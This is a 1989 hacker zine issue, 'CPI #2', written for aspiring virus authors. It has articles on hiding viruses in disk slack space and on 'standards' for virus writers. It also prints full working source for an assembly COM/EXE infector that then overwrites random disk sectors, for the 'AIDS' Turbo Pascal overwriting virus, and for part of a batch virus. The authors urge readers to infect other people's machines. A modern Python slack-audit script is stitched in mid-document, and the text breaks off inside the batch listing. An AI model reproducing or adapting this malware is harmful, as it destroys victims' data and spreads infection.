[2.1]
[CPI logo]
C O R R U P T E D
P R O G R A M M I N G
I N T E R N A T I O N A L
presents:
Virili And Trojan Horses
A Protagonist's Point Of View
Issue #2
DISCLAIMER::All of the information contained in this newsletter reflects the
thoughts and ideas of the authors, not their actions. The sole
purpose of this document is to educate and spread information.
Any illegal or illicit action is not endorsed by the authors or
CPI. The authors and CPI are not responsible for any information
which may present itself as old or mis-interpreted, and actions
by the reader. Remember, 'Just Say No!'
CPI #2
Issue 2, Volume 1
Release Date::July 27,1989
Introduction To CPI#2
---------------------
Well, here is the "long awaited" second issue of CPI, A Protagonist's Point
of view. This issue should prove a bit interesting, I dunno, but at least
entertaining for the time it takes to read. Enjoy the information and don't
forget the disclaimer.
Oh yes, if you have some interesting articles or an application to send
us, just see the BBS list at the end of this document. Thanx. All applications
and information will be voted on through the CPI Inner Circle. Hope you enjoy
this issue as much as we enjoyed typing it... hehe...
Until our next issue, (which may be whenever), good-bye.
Doctor Dissector
Table of Contents
-----------------
Part Title Author
-----------------------------------------------------------------------------
2.1 Title Page, Introduction, & TOC....................... Doctor Dissector
2.2 Another Explanation Of Virili And Trojans............. Acid Phreak
2.3 V-IDEA-1.............................................. Ashton Darkside
2.4 V-IDEA-2.............................................. Ashton Darkside
2.5 The Generic Virus..................................... Doctor Dissector
2.6 Aids.................................................. Doctor Dissector
2.7 Batch File Virus...................................... PHUN 3.2
2.8 Basic Virus........................................... PHUN 3.2
2.9 The Alameda Virus..................................... PHUN 4.3
2.10 Virili In The News.................................... Various Sources
2.11 Application For CPI................................... CPI Inner Circle
(CPI Node Phone #'s Are In 2.11)
[2.2]
Explanation of Viruses and Trojans Horses
-----------------------------------------
Written by Acid Phreak
Like its biological counterpart, a computer virus is an agent of
infection, insinuating itself into a program or disk and forcing its host
to replicate the virus code. Hackers fascinated by the concept of "living"
code wrote the first viruses as projects or as pranks. In the past few
years, however, a different kind of virus has become common, one that lives
up to an earlier meaning of the word: in Latin, virus means poison.
These new viruses incorporate features of another type of insidious
program called a Trojan horse. Such a program masquerades as a useful
utility or product but wreaks havoc on your system when you run it. It may
erase a few files, format your disk, steal secrets--anything software can
do, a Trojan horse can do. A malicious virus can do all this then attempt
to replicate itself and infect other systems.
The growing media coverage of the virus concept and of specific viruses
has promoted the development of a new type of software. Antivirus programs,
vaccines--they go by many names, but their purpose is to protect from virus
attack. At present there are more antivirus programs than known viruses
(not for long).
Some experts quibble about exactly what a virus is. The most widely
known viruses, the IBM Xmas virus and the recent Internet virus, are not
viruses according to some experts because they do not infect other programs.
Others argue that every Trojan horse is a virus--one that depends completely
on people to spread it.
How They Reproduce:
-------------------
Viruses can't travel without people. Your PC will not become infected
unless someone runs an infected program on it, whether accidentally or on
purpose. PC's are different from mainframe networks in this way--the
mainframe Internet virus spread by transmitting itself to other systems and
ordering them to execute it as a program. That kind of active transmission
is not possible on a PC.
Virus code reproduces by changing something in your system. Some viruses
strike COMMAND.COM or the hidden system files. Others, like the notorious
Pakistani-Brain virus, modify the boot sector of floppy disks. Still others
attach themselves to any .COM or .EXE file. In truth, any file on your
system that can be executed--whether it's a program, a device driver, an
overlay, or even a batch file--could be the target of a virus.
When an infected program runs, the virus code usually executes first and
then transfers control to the original program. The virus may immediately
infect other programs, or it may load itself into RAM and continue spreading.
If the virus can infect a file that will be used on another system, it has
succeeded.
What They Can Do:
-----------------
Viruses go through two phases: a replication phase and an action phase.
The action doesn't happen until a certain event occurs--perhaps reaching a
special date or running the virus a certain number of times. It wouldn't
make sense for a virus to damage your system the first time it ran; it needs
some time to grow and spread first.
The most vulnerable spot for a virus attack is your hard disk's file
allocation table (FAT). This table tells DOS where every file's data resides
on the disk. Without the FAT, the data's still there but DOS can't find it.
A virus could also perform a low-level format on some or all the tracks of
your hard disk, erase all files, or change the CMOS memory on AT-class
computers so that they don't recognize the hard disk.
Most of the dangers involve data only, but it's even possible to burn
out a monochrome monitor with the right code.
Some virus assaults are quite subtle. One known virus finds four
consecutive digits on the screen and switches two. Let's hope you're not
balancing the company's books when this one hits. Others slow down system
operations or introduce serious errors.
[2.3]
-------------------------------------------------------------------------------
[CPI logo]
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
* * * present * * *
"Ok, I've written the virus, now where the hell do I put it?"
By Ashton Darkside (DUNE / SATAN / CPI)
*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk a lot, but we "just say no" to doing it.
*******************************************************************************
Ok, wow! You've just invented the most incredibly nifty virus. It
slices, it dices, it squishes, it mushes (sorry Berke Breathed) people's data!
But the only problem is, if you go around infecting every damn file, some cute
software company is going to start putting in procedures that checksum their
warez each time they run, which will make life for your infecting virus a total
bitch. Or somebody's going to come up with an incredibly nifty vaccination util
that will wipe it out. Because, I mean, hey, when disk space starts vanishing
suddenly in 500K chunks people tend to notice. Especially people like me that
rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying
"wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need
to go around wasting your precious time when the answer is right there in front
of you! Think about it, you could be putting that time into writing better and
more innovative viruses, or you could be worrying about keeping the file size,
the date & time, and the attributes the same.

With this system, you only need to infect one file, preferably one that's NOT
a system file, but something that will get run a lot, and will be able to load
your nifty virus on a daily basis. This system also doesn't take up any disk
space, other than the loader. And the loader could conceivably be under 16
bytes (damn near undetectable).

First of all, you need to know what programs to infect. Now, everybody knows
about using COMMAND.COM and that's unoriginal anyway, when there are other
programs people run all the time. Like DesqView or Norton Utilities or MASM or
a BBS file or WordPerfect; you get the idea. Better still are DOS commands like
Format, Link or even compression utilities. But you get the point. Besides,
who's going to miss 16 bytes, right?

Now, the good part: where to put the damn thing. One note to the programmer:
This could get tricky if your virus is over 2k or isn't written in Assembly,
but the size problem is easy enough, it would be a simple thing to break your
virus into parts and have the parts load each other into the system so that
you do eventually get the whole thing. The only problem with using languages
besides assembly is that it's hard to break them up into 2k segments. If you
want to infect floppies, or smaller disks, you'd be best off to break your file
into 512 byte segments, since they're easier to hide. But, hey, in assembly,
you can generate pretty small programs that do a lot, though.

Ok, by now you've probably figured out that we're talking about the part of the
disk called 'the slack'. Every disk that your computer uses is divided up into
parts called sectors, which are (in almost all cases) 512 bytes. But in larger
disks, and even in floppies, keeping track of every single sector would be a
complete bitch. So the sectors are bunched together into groups called
'clusters'. On floppy disks, clusters are usually two sectors, or 1024 bytes,
and on hard disks, they're typically 4096 bytes, or eight sectors. Now think
about it, you have programs on your hard disk, and what are the odds that they
will have sizes that always end up in increments of 4096? If I've lost you,
think of it this way: the file takes up a bunch of clusters, but in the last
cluster it uses, there is usually some 'slack', or space that isn't used by the
file. This space is between where the actual file ends and where the actual
cluster ends. So, potentially, you can have up to 4095 bytes of 'slack' on a
file on a hard disk, or 1023 bytes of 'slack' on a floppy. In fact, right now,
run the Norton program 'FS /S /T' command from your root directory, and
subtract the total size of the files from the total disk space used. That's
how much 'slack' space is on your disk (a hell of a lot, even on a floppy).

To use the slack, all you need to do is to find a chunk of slack big enough to
fit your virus (or a segment of your virus) and use direct disk access (INT 13)
to put your virus there. There is one minor problem with this. Any disk write
to that cluster will overwrite the slack with 'garbage' from memory. This is
because of the way DOS manages its disk I/O and it can't be fixed without a lot
of hassles. But, there is a way around even this. And it involves a popular
(albeit outdated and usually ineffectual) form of virus protection called the
READ-ONLY flag. This flag is the greatest friend of this type of virus. Because
if the file is not written to, the last cluster is not written to, and voila!
Your virus is safe from mischievous accidents. And since the R-O flag doesn't
affect INT 13 disk I/O, it won't be in your way. Also, check for programs with
the SYSTEM flag set because that has the same Read-only effect (even though I
haven't seen it written, it's true that if the file is designated system, DOS
treats it as read-only, whether the R-O flag is set or not). The space after
IBMBIOS.COM or IBMDOS.COM in MS-DOS (not PC-DOS, it uses different files, or so
I am told; I've been too lazy to find out myself) or a protected (!) COMMAND.COM
file in either type of DOS would be ideal for this.

All you have to do is then insert your loader into some innocent-looking file,
and you are in business. All your loader has to do is read the sector into the
highest part of memory, and do a far call to it. Your virus can then go about
waiting for floppy disks to infect, and place loaders on any available
executable file on the disk. Sound pretty neat? It is!

Anyway, have fun, and be sure to upload your virus, along with a README file on
how it works to CPI Headquarters so we can check it out! And remember: don't
target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if
the Sysop is a leech and you want to shove his balls down his throat. Because
if all the PHP boards go down (especially members of CPI), who the hell can you
go to for all these nifty virus ideas? And besides, it's betraying your own
people, which is uncool even if you are an anarchist. So, target uncool PD
boards, or your boss's computer or whatever, but don't attack your friends.
Other than that, have phun, and phuck it up!
Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)
PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk).
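To make the slack arithmetic above concrete from the auditing side, here is an added Python example (not code from the zine or its author) that does what the 'FS /S /T' subtraction does for a directory listing, and reads back the unused tail of a file's final cluster so an examiner can see what is sitting there; the listing and the cluster contents are constructed sample data.

```python
"""Cluster slack audit for a FAT-style volume (added example, not from CPI #2).

A file occupies whole clusters; the bytes between its end and the end of its
last cluster are 'slack'. The total slack on a volume is allocated space minus
the sum of file sizes, which is the 'FS /S /T' subtraction the article describes.
"""
from math import ceil

FLOPPY_CLUSTER = 1024    # two 512-byte sectors, as stated in the article
HARDDISK_CLUSTER = 4096  # eight 512-byte sectors

# Constructed directory listing: name -> size in bytes (hypothetical values).
SAMPLE_LISTING = {
    "COMMAND.COM": 25307,
    "FORMAT.COM": 11671,
    "EMPTY.DAT": 0,       # zero-length file: owns no cluster at all
    "FULL.BIN": 8192,     # ends exactly on a cluster boundary: no slack
}

# Constructed image of one floppy cluster holding a 700-byte file whose
# slack (bytes 700..1023) is not zero-filled.
SAMPLE_CLUSTER = bytes(700) + b"X" * (FLOPPY_CLUSTER - 700)


def clusters_used(size, cluster_size):
    """Number of clusters a file of `size` bytes occupies (0 for an empty file)."""
    return ceil(size / cluster_size)


def slack_bytes(size, cluster_size):
    """Unused bytes in the file's final cluster; at most cluster_size - 1."""
    return clusters_used(size, cluster_size) * cluster_size - size


def slack_report(listing, cluster_size):
    """Return (per-file slack, total allocated bytes, total slack) for a listing."""
    per_file = {name: slack_bytes(size, cluster_size) for name, size in listing.items()}
    allocated = sum(clusters_used(s, cluster_size) * cluster_size for s in listing.values())
    total_slack = allocated - sum(listing.values())
    return per_file, allocated, total_slack


def slack_region(last_cluster, size, cluster_size):
    """Bytes of `last_cluster` (raw cluster contents) that lie past the file's end."""
    if len(last_cluster) != cluster_size:
        raise ValueError("last_cluster must be exactly one cluster long")
    used = size % cluster_size
    if used == 0:  # empty file or file ending on a boundary: nothing past the end
        return b""
    return last_cluster[used:]


def slack_has_data(last_cluster, size, cluster_size):
    """True if any slack byte is non-zero.

    Not proof of hidden data on its own: as the article notes, DOS fills slack
    with whatever was in its buffer, so a clean system also shows non-zero slack.
    """
    return any(slack_region(last_cluster, size, cluster_size))


if __name__ == "__main__":
    per_file, allocated, total = slack_report(SAMPLE_LISTING, HARDDISK_CLUSTER)
    for name, slack in per_file.items():
        print(f"{name:12s} slack={slack:5d} bytes")
    print(f"allocated={allocated} total_slack={total}")
    print("slack of sample file is non-zero:",
          slack_has_data(SAMPLE_CLUSTER, 700, FLOPPY_CLUSTER))
```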
Call these boards because the sysops are cool:
Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader)
System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader)
The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader)
D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader)
The Jolly Bardsmen's Pub & Tavern
The Sierra Crib
The Phrozen Phorest
Knight Shadow's Grotto
And if I forgot your board, sorry, but don't send me E-mail bitching about it!
[2.4]
-------------------------------------------------------------------------------
[CPI logo]
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
* * * present * * *
CPI Virus Standards - Protect yourself and your friends
By Ashton Darkside (DUNE / SATAN / CPI)
*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk a lot, but we "just say no" to doing it.
*******************************************************************************
One of the main problems with viruses is that once you set one loose,
it is no longer under your control. I propose to stop this by introducing some
standards of virus writing that will enable them to be deactivated whenever
they enter a 'friendly' (CPI) system. In the long run, even the author of the
virus is not immune to being attacked. The following are what I have termed the
CPI standards for writing viruses. They will allow a virus to easily check any
system they are being run on for a type of 'identity badge'. If it is found,
the virus will not infect the system it is being run on. The other standards
are mostly written around this.
CPI Standards for writing viruses -
1 - The virus will have an 'active period' and an 'inactive period'.
The active periods will be no more than one year in length (to make
it more difficult to discover the virus). You may release different
versions of your virus with different 'active periods'. It is not
recommended that your virus deactivate itself after the set active
period, as this would enable people to deactivate viruses by using
their computer with the date set to 2069 or something. It is also
required that activation periods begin on January 1 and end on
December 31. This will coincide with the changing identity codes.
2 - The virus will check for an identity code by executing Interrupt
12h with the following register settings: AX - 4350, BX - 4920,
CX - AB46, DX - 554E. If the system is friendly, then a pointer
will be returned in CX:DX to an ASCIIZ (0-terminated) string which
will have different contents in different years. The codes are not
to be included in any text file, and should only be given through
E-mail on CPI affiliated systems. You can always ask me by sending
me mail at The Andromeda Strain BBS. If a system is detected as
friendly, the virus will not attempt to infect or damage it, but it
is ok to display a little greeting message about how lucky the
user was.
3 - We very much encourage you to upload your virus, along with a brief
description on the workings into the CPI section at The Andromeda
Strain BBS. Only CPI members will know about your virus. This is
so that CPI members can share techniques and it also allows us to
verify that the identity check works. If we see any improvements
that could be made, such as ways to streamline code, better ways of
spreading, etc. we will inform you so that you can make the changes
if you wish.
4 - It is also suggested that you use ADS standard for virus storage on
infected disks. This method uses disk slack space for storage and
is more thoroughly described in a previous text file by me. I think
that this is the most effective and invisible way to store viruli.
5 - A list of CPI-Standard viruli will be available at all times from
The Andromeda Strain BBS, to CPI users. Identity strings will also
be available to anyone in CPI, or anyone who uploads source code to
a virus which is 100% complete except for the Identity string (it
must be written to CPI-Standards). Non-CPI members who do this will
be more seriously considered for membership in CPI.
Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)
PS: This file (by itself) has approx 2.5k of slack.
;[2.5]
;=============================================================================
;
; C*P*I
;
; CORRUPTED PROGRAMMING INTERNATIONAL
; -----------------------------------
; p r e s e n t s
;
; T H E
; _ _
; (g) GENERIC VIRUS (g)
; ^ ^
;
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TOO BIG TO
; FIT IN MEMORY". THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
; THE DISK. HAVE PHUN WITH THIS ONE.
;
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
; DOCTOR DISSECTOR
; CPI INNER CIRCLE
;
;=============================================================================
MAIN:
NOP ;| Marker bytes that identify this program
NOP ;| as infected/a virus
NOP ;|
MOV AX,00 ;| Initialize the pointers
MOV ES:[POINTER],AX ;|
MOV ES:[COUNTER],AX ;|
MOV ES:[DISKS B],AL ;|
MOV AH,19 ;| Get the selected drive (dir?)
INT 21 ;|
MOV CS:DRIVE,AL ;| Get current path (save drive)
MOV AH,47 ;| (dir?)
MOV DH,0 ;|
ADD AL,1 ;|
MOV DL,AL ;| (in actual drive)
LEA SI,CS:OLD_PATH ;|
INT 21 ;|
MOV AH,0E ;| Find # of drives
MOV DL,0 ;|
INT 21 ;|
CMP AL,01 ;| (Check if only one drive)
JNZ HUPS3 ;| (If not one drive, go the HUPS3)
MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive)
HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive
LEA BX,SEARCH_ORDER ;|
ADD BX,AX ;|
ADD BX,0001 ;|
MOV CS:POINTER,BX ;|
CLC ;|
CHANGE_DISK: ;| Carry is set if no more .COM files are
JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be
MOV AH,17 ;| renamed to .COM (change .EXE to .COM)
LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program
INT 21 ;| to large to fit in memory" when starting
CMP AL,0FF ;| larger infected programs
JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found)
MOV AH,2CH ;| If neither .COM or .EXE files can be found,
INT 21 ;| then random sectors on the disk will be
MOV BX,CS:POINTER ;| overwritten depending on the system time
MOV AL,CS:[BX] ;| in milliseconds. This is the time of the
MOV BX,DX ;| complete "infection" of a storage medium.
MOV CX,2 ;| The virus can find nothing more to infect
MOV DH,0 ;| starts its destruction.
INT 26 ;| (write crap on disk)
NO_NAME_CHANGE: ;| Check if the end of the search order table
MOV BX,CS:POINTER ;| has been reached. If so, end.
DEC BX ;|
MOV CS:POINTER,BX ;|
MOV DL,CS:[BX] ;|
CMP DL,0FF ;|
JNZ HUPS2 ;|
JMP HOPS ;|
HUPS2: ;| Get a new drive from the search order table
MOV AH,0E ;| and select it, beginning with the ROOT dir.
INT 21 ;| (change drive)
MOV AH,3B ;| (change path)
LEA DX,PATH ;|
INT 21 ;|
JMP FIND_FIRST_FILE ;|
FIND_FIRST_SUBDIR: ;| Starting from the root, search for the
MOV AH,17 ;| first subdir. First, (change .exe to .com)
LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the
INT 21 ;| old directory.
MOV AH,3B ;| (use root directory)
LEA DX,PATH ;|
INT 21 ;|
MOV AH,04E ;| (search for first subdirectory)
MOV CX,00010001B ;| (dir mask)
LEA DX,MASKE_DIR ;|
INT 21 ;|
JC CHANGE_DISK ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
DEC BX ;|
JZ USE_NEXT_SUBDIR ;|
FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more
MOV AH,4FH ;| are found, the (search for next subdir)
INT 21 ;| drive will be changed.
JC CHANGE_DISK ;|
DEC BX ;|
JNZ FIND_NEXT_SUBDIR ;|
USE_NEXT_SUBDIR:
MOV AH,2FH ;| Select found directory. (get dta address)
INT 21 ;|
ADD BX,1CH ;|
MOV ES:[BX],W"\" ;| (address of name in dta)
INC BX ;|
PUSH DS ;|
MOV AX,ES ;|
MOV DS,AX ;|
MOV DX,BX ;|
MOV AH,3B ;| (change path)
INT 21 ;|
POP DS ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
MOV CS:COUNTER,BX ;|
FIND_FIRST_FILE: ;| Find first .COM file in the current dir.
MOV AH,04E ;| If there are none, (Search for first)
MOV CX,00000001B ;| search the next directory. (mask)
LEA DX,MASKE_COM ;|
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
JMP CHECK_IF_ILL ;|
FIND_NEXT_FILE: ;| If program is ill (infected) then search
MOV AH,4FH ;| for another. (search for next)
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
CHECK_IF_ILL: ;| Check if already infected by virus.
MOV AH,3D ;| (open channel)
MOV AL,02 ;| (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| (save channel)
MOV AH,3FH ;| (read file)
MOV CH,BUFLEN ;|
MOV DX,BUFFER ;| (write in buffer)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV BX,CS:[BUFFER] ;| (look for three NOP's)
CMP BX,9090 ;|
JZ FIND_NEXT_FILE ;|
MOV AH,43 ;| This section by-passes (write enable)
MOV AL,0 ;| the MS/PC DOS Write Protection.
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV AH,43 ;|
MOV AL,01 ;|
AND CX,11111110B ;|
INT 21 ;|
MOV AH,3D ;| Open file for read/write (open channel)
MOV AL,02 ;| access (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| Read date entry of program and (channel)
MOV AH,57 ;| save for future use. (get date)
MOV AL,0 ;|
INT 21 ;|
PUSH CX ;| (save date)
PUSH DX ;|
MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp)
MOV CS:[JMPBUF],DX ;| the program will be saved for future use.
MOV DX,CS:[BUFFER+1] ;| (save new jump)
LEA CX,CONT-100 ;|
SUB DX,CX ;|
MOV CS:[CONTA],DX ;|
MOV AH,57 ;| The virus now copies itself to (write date)
MOV AL,1 ;| to the start of the file.
POP DX ;|
POP CX ;| (restore date)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus
MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the
;| start of the program. This is done to
HOPS: ;| preserve the executability of the host
NOP ;| program as much as possible. After saving,
CALL USE_OLD ;| it still works with the jump address in the
;| virus. The jump address in the virus differs
;| from the jump address in memory
CONT DB 0E9 ;| Continue with the host program (make jump)
CONTA DW 0 ;|
MOV AH,00 ;|
INT 21 ;|
USE_OLD:
MOV AH,0E ;| Reactivate the selected (use old drive)
MOV DL,CS:DRIVE ;| drive at the start of the program, and
INT 21 ;| reactivate the selected path at the start
MOV AH,3B ;| of the program.(use old drive)
LEA DX,OLD_PATH-1 ;| (get old path and backslash)
INT 21 ;|
RET ;|
SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
POINTER DW 0000 ;| (pointer f. search order)
COUNTER DW 0000 ;| (counter f. nth. search)
DISKS DB 0 ;| (number of disks)
MASKE_COM DB "*.COM",00 ;| (search for com files)
MASKE_DIR DB "*",00 ;| (search for dir's)
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
DB 0,"????????EXE",0,0,0,0
DB 0,"????????COM",0
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
DB 0,"???????????",0,0,0,0
DB 0,"????????COM",0
BUFFER EQU 0E00 ;| (a safe place)
BUFLEN EQU 208H ;| Length of virus. Modify this accordingly
;| if you modify this source. Be careful
;| for this may change!
JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp)
PATH DB "\",0 ;| (first place)
DRIVE DB 0 ;| (actual drive)
BACK_SLASH DB "\"
OLD_PATH DB 32 DUP (?) ;| (old path)
[2.6]
[CPI logo]
C O R R U P T E D
P R O G R A M M I N G
I N T E R N A T I O N A L
P R E S E N T S
[AIDS logo]
A NEW AND IMPROVED VIRUS FOR PC/MS DOS MACHINES
CREATED BY: DOCTOR DISSECTOR
FILE INTENDED FOR EDUCATIONAL USE ONLY
AUTHOR NOT RESPONSIBLE FOR READERS
DOES NOT ENDORSE ANY ILLEGAL ACTIVITIES
Well well, here it is... I call it AIDS... It infects all COM files, but it is
not perfect, so it will also change the date/time stamp to the current system.
Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them!
Anyway, this virus was originally named NUMBER ONE, and I modified the code so
that it would fit my needs. The source code, which is included with this neato
package was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works.
Well, I added a few things, you can experiment or mess around with it if you'd
like to, and add any mods to it that you want, but change the name and give us
some credit if you do.
The file is approximately 13k long, and this extra memory will be added to the
file it picks as host. If no more COM files are to be found, it picks a random
value from 1-10, and if it happens to be the lucky number 7, AIDS will present
a nice screen with lots of smiles, with a note telling the operator that their
system is now screwed, I mean permanently. The encrypted files containing AIDS
in their code are IRREVERSIBLY messed up. Oh well...
Again, neither CPI nor the author of Number One or AIDS endorses this document
and program for use in any illegal manner. Also, CPI, the author to Number One
and AIDS is not responsible for any actions by the readers that may prove harm
in any way or another. This package was written for EDUCATIONAL purposes only!
{ Beginning of source code, Turbo Pascal 3.01a }
{C-}
{U-}
{I-} { Wont allow a user break, enable IO check }
{ -- Constants --------------------------------------- }
Const
VirusSize = 13847; { AIDS's code size }
Warning :String[42] { Warning message }
= 'This File Has Been Infected By AIDS! HaHa!';
{ -- Type declarations------------------------------------- }
Type
DTARec =Record { Data area for file search }
DOSnext :Array[1..21] of Byte;
Attr : Byte;
Ftime,
FDate,
FLsize,
FHsize : Integer;
FullName: Array[1..13] of Char;
End;
Registers = Record {Register set used for file search }
Case Byte of
1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
End;
{ -- Variables--------------------------------------------- }
Var
{ Memory offset program code }
ProgramStart : Byte absolute Cseg:$100;
{ Infected marker }
MarkInfected : String[42] absolute Cseg:$180;
Reg : Registers; { Register set }
DTA : DTARec; { Data area }
Buffer : Array[Byte] of Byte; { Data buffer }
TestID : String[42]; { To recognize infected files }
UsePath : String[66]; { Path to search files }
{ Lenght of search path }
UsePathLenght: Byte absolute UsePath;
Go : File; { File to infect }
B : Byte; { Used }
LoopVar : Integer; {Will loop forever}
{ -- Program code------------------------------------------ }
Begin
GetDir(0, UsePath); { get current directory }
if Pos('\', UsePath) <> UsePathLenght then
UsePath := UsePath + '\';
UsePath := UsePath + '*.COM'; { Define search mask }
Reg.AH := $1A; { Set data area }
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
Reg.AH := $4E;
Reg.DS := Seg(UsePath);
Reg.DX := Ofs(UsePath[1]);
Reg.CX := $ff; { Set attribute to find ALL files }
MsDos(Reg); { Find first matching entry }
IF not Odd(Reg.Flags) Then { If a file found then }
Repeat
UsePath := DTA.FullName;
B := Pos(#0, UsePath);
If B > 0 then
Delete(UsePath, B, 255); { Remove garbage }
Assign(Go, UsePath);
Reset(Go);
If IOresult = 0 Then { If not IO error then }
Begin
BlockRead(Go, Buffer, 2);
Move(Buffer[$80], TestID, 43);
{ Test if file already ill(Infected) }
If TestID <> Warning Then { If not then ... }
Begin
Seek (Go, 0);
{ Mark file as infected and .. }
MarkInfected := Warning;
{ Infect it }
BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
Close(Go);
Halt; {.. and halt the program }
End;
Close(Go);
End;
{ The file has already been infected, search next. }
Reg.AH := $4F;
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
{ ......................Until no more files are found }
Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
begin
Writeln(''); {Give a lot of smiles}
Writeln('');
Writeln(' ');
Writeln(' ATTENTION: ');
Writeln(' I have been elected to inform you that throughout your process of ');
Writeln(' collecting and executing files, you have accidentally HKф ');
Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
Writeln(' be; YES, it CAN be, a ћчs has infected your system. Now what do ');
Writeln(' you have to say about that? HAHAHAHA. Have HЅ with this one and ');
Writeln(' remember, there is NO cure for ');
Writeln(' ');
Writeln(' лллллллллл лллллллллллл ллллллллллл лллллллллл ');
Writeln(' лллББББББллл ББББллББББББ ллБББББББллл лллБББББББлл ');
Writeln(' ллББ ллБ ллБ ллБ ллБ ллББ ББ ');
Writeln(' ллБ ллБ ллБ ллБ ллБ ллБ ');
Writeln(' ллллллллллллБ ллБ ллБ ллБ лллллллллллл ');
Writeln(' ллББББББББллБ ллБ ллБ ллБ БББББББББллБ ');
Writeln(' ллБ ллБ ллБ ллБ ллБ ллБ ');
Writeln(' ллБ ллБ ллБ ллБ лллБ лл лллБ ');
Writeln(' ллБ ллБ лллллллллллл лллллллллллББ ллллллллллББ ');
Writeln(' ББ ББ ББББББББББББ БББББББББББ ББББББББББ ');
Writeln(' ');
Writeln(' ');
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.
{ Although this is a primitive virus, it is effective. }
{ In this virus only the .COM files are infected. }
{ It is about 13K and it will change the date entry. }
[2.7]
Batch Viruses
-------------
Whoever thought that viruses could be in a BATCH file? This virus, which we
are about to see, makes use of the MS-DOS operating system. This BATCH virus
uses the DEBUG & EDLIN programs.
Name: VR.BAT
echo = off ( Self explanatory)
ctty nul ( This is important. Console output is turned off)
path c:\msdos ( May differ on other systems )
dir *.com/w>ind ( The directory is written on "ind" ONLY name entries)
edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear)
debug ind<2 ( New batch program is created with debug)
edlin name.bat<3 ( This batch goes to an executable form because of EDLIN)
ctty con ( Console interface is again assigned)
name ( Newly created NAME.BAT is called. )
In addition to this batch file, there are three command files, here named 1, 2 and 3.
Here is the first command file:
-------------------------------
Name: 1
1,4d ( Here line 1-4 of the "IND" file are deleted )
e ( Save file )
Here is the second command file:
--------------------------------
Name: 2
m100,10b,f000 (First program name is moved to the F000H address to save)
